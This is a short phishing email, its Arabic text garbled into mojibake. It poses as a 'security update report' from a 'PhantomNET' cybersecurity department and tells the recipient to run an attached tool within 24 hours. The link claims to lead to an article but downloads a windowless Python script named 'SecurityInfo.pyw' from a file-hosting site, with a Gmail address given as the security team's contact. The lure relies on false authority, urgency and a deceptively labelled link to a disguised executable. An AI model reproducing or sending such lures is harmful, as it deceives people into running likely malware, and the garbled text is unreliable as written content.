vict.phantomNET@outlook.com

๐ ุชูุฑูุฑ ุงูุชุญุฏูุซ ุงูุฃููู โ SecurityInfo

ุตุงุฏุฑ ุนู: ูุณู ุงูุฃูู ุงูุณูุจุฑุงูู โ PhantomNET

ุจูุงุกู ุนูู ุชูุตูุงุช ุงููุญุต ุงูุฏูุฑู ููุจููุฉ ุงูุชุญุชูุฉ ุงูุฑูููุฉุ ูุฑุฌู ูููู ุชุดุบูู ุงูุฃุฏุงุฉ ุงููุฑููุฉ ูุฅุฌุฑุงุก ุงูุชุญุฏูุซ ุงูุฃููู ุงููุงุฒู.  

๐ ุงูููุนุฏ ุงูููุงุฆู ูุชูููุฐ ุงูุชุญุฏูุซ: ุฎูุงู 24 ุณุงุนุฉ ูู ุงุณุชูุงู ูุฐู ุงูุฑุณุงูุฉ.

<a href="https://www.upload.ee/download/18166828/efaec3848d7b20c43db2/SecurityInfo.pyw"> ููุฒูุฏ ูู ุงูุชูุงุตูู ุงูุฑุฃ ูุฐุง ุงูููุงู </a>

๐จ ูุฃู ุงุณุชูุณุงุฑุ ูุฑุฌู ุงูุชูุงุตู ูุน ูุฑูู ุงูุฃูู ุนูู:  
phantomnet514@gmail.com

ูุน ุงูุชุญูุฉุ  
ูุณู ุงูุฃูู ุงูุณูุจุฑุงูู โ PhantomNET
